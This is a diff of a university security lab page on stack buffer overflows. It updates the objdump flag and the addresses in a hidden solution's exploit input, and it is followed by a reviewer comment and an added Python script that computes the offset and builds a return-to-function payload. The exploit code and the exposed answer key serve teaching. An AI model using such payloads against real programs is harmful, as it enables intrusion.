| | isc:labs:05 [2025/10/27 16:30] florin.stancu | | isc:labs:05 [2025/11/04 11:49] (current) david.gherghita [Exercises] |
|---|---|---|---|
| Line 168: | Line 168: | ||
| * Next, try to answer this question: how many bytes do I need to overflow until I get to the EIP saved by the ''call''er (also see the stack diagram above)? | * Next, try to answer this question: how many bytes do I need to overflow until I get to the EIP saved by the ''call''er (also see the stack diagram above)? | ||
| - | * Use either ''objdump -S'' or ''pwndbg> disass <name>'' on the //vulnerable function// to figure out the offset of the buffer variable from the EBP register using the assembly code; | + | * Use either ''objdump -S -M intel'' or ''pwndbg> disass <name>'' on the //vulnerable function// to figure out the offset of the buffer variable from the EBP register using the assembly code; |
| * In order to check if the answer is right, try to use an input of the following form: ''%%b"A" * N + b"\xEF\xCD\xAB\x98"%%''; this should make the program segfault with the end instruction pointer at ''0x98ABCDEF'' (readily visible in pwndbg's automatic registers printing); | * In order to check if the answer is right, try to use an input of the following form: ''%%b"A" * N + b"\xEF\xCD\xAB\x98"%%''; this should make the program segfault with the end instruction pointer at ''0x98ABCDEF'' (readily visible in pwndbg's automatic registers printing); | ||
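Review bot: the change to ''objdump -S -M intel'' in the second bullet makes objdump's output use the same Intel syntax that pwndbg disassembles in by default, so the ''[ebp-0x..]'' operand reads identically in both tools; one caveat worth a few words in the bullet is that ''-S'' only intermixes source when the binary carries debug info (it implies ''-d''), so on a binary built without ''-g'' the reader will see plain disassembly, which is all the offset lookup needs.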
| Line 177: | Line 177: | ||
| <solution -hidden> | <solution -hidden> | ||
| <code> | <code> | ||
| - | pwndbg> run "Salam" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 0x19 +b"\xb6\x91\x04\x08" + b"\x12\x93\x04\x08" + b"\xbe\xba\xfe\xca")') | + | pwndbg> run "Salam" < <(python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 0x19 +b"\xa6\x91\x04\x08" + b"\x0e\x93\x04\x08" + b"\xbe\xba\xfe\xca")') |
| </code> | </code> | ||
| </solution> | </solution> | ||
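The offset-finding steps at Line 168 and the solution input at Line 177 are two halves of one procedure: read the buffer's distance below EBP from the disassembly, add 4 for the saved EBP to reach the saved EIP, confirm N with a marker value, then place the real addresses. The script below is an added worked example, not the lab's own code or the solution's command line. It does not run the vulnerable binary; it models which 4 bytes land in EIP for a given N so the check can be reasoned about offline. The disassembly line ''SAMPLE_DISASM'' is constructed, and its offset 0x15 is an assumption chosen so that N comes out as 0x19, matching the solution. The three addresses are the ones the solution hardcodes; reading them as function address, return address and single argument is an assumption about the lab binary.

```python
import re
import struct
import sys

# Intel-syntax memory operand for a local below the frame pointer, as printed
# by `objdump -d -M intel` or pwndbg: e.g. "lea    eax,[ebp-0x15]".
EBP_OFFSET_RE = re.compile(r"\[\s*ebp\s*-\s*(0x[0-9a-fA-F]+|\d+)\s*\]")

# Constructed disassembly line standing in for the vulnerable function's
# buffer access. The 0x15 is an assumption picked so that N == 0x19, the
# filler length used by the lab's solution.
SAMPLE_DISASM = "8049196:\t8d 45 eb\tlea    eax,[ebp-0x15]"


def buffer_offset_from_ebp(disasm_line: str) -> int:
    """Distance of the buffer below EBP, read from a line such as
    'lea eax,[ebp-0x15]' (returns 0x15)."""
    m = EBP_OFFSET_RE.search(disasm_line)
    if m is None:
        raise ValueError(f"no [ebp-<offset>] operand in {disasm_line!r}")
    return int(m.group(1), 0)


def bytes_to_saved_eip(buf_off: int) -> int:
    """Filler from the buffer start to the saved EIP on a 32-bit frame:
    buf_off bytes reach the saved EBP, 4 more step over it."""
    return buf_off + 4


def p32(value: int) -> bytes:
    """Little-endian 32-bit packing, the byte order the stack expects
    (0x98ABCDEF -> EF CD AB 98)."""
    return struct.pack("<I", value)


def u32(data: bytes) -> int:
    return struct.unpack("<I", data)[0]


def marker_payload(n: int, marker: int = 0x98ABCDEF) -> bytes:
    """The exercise's offset check: N filler bytes followed by a value that
    should appear in EIP when the function returns."""
    return b"A" * n + p32(marker)


def eip_from_crash(payload: bytes, true_n: int):
    """Model the `ret`: the 4 bytes sitting exactly true_n bytes into the
    buffer are popped into EIP. Returns None when the overflow stops short of
    the saved EIP (the real program would then jump to the stale value)."""
    slot = payload[true_n:true_n + 4]
    if len(slot) < 4:
        return None
    return u32(slot)


def marker_adjustment(observed_eip: int, marker: int = 0x98ABCDEF):
    """From the EIP seen in the crash, say by how many bytes N overshot: each
    0x41 ('A') in the low end of EIP means the marker landed one byte late.
    0 means N is exact; None means no part of the marker reached EIP."""
    obs = p32(observed_eip)
    want = p32(marker)
    for shift in range(4):
        if obs[shift:] == want[:4 - shift] and all(b == 0x41 for b in obs[:shift]):
            return shift
    return None


def ret2func_payload(n: int, func_addr: int, ret_after: int, *args: int) -> bytes:
    """Overwrite the saved EIP with func_addr. On a 32-bit cdecl stack the next
    slot is where func_addr will return to, and its arguments follow in order."""
    payload = b"A" * n + p32(func_addr) + p32(ret_after)
    for a in args:
        payload += p32(a)
    return payload


def solution_payload() -> bytes:
    """The lab solution's input rebuilt from the addresses it hardcodes.
    Assumption about the lab binary: 0x080491a6 is the function to jump to,
    0x0804930e the address it should return to, 0xcafebabe its one argument."""
    n = bytes_to_saved_eip(buffer_offset_from_ebp(SAMPLE_DISASM))
    return ret2func_payload(n, 0x080491A6, 0x0804930E, 0xCAFEBABE)


if __name__ == "__main__":
    # Same use as in the lab: feed the raw bytes to the program's stdin,
    # e.g.  pwndbg> run "Salam" < <(python3 payload.py)
    sys.stdout.buffer.write(solution_payload())
```

The useful part for the offset check is ''marker_adjustment'': if pwndbg reports EIP as ''0xCDEF4141'' instead of ''0x98ABCDEF'', the two ''0x41'' bytes say the marker landed two bytes past the return slot, so N was two too large; an EIP with none of the marker's bytes means the overflow did not reach the saved EIP and N is too small.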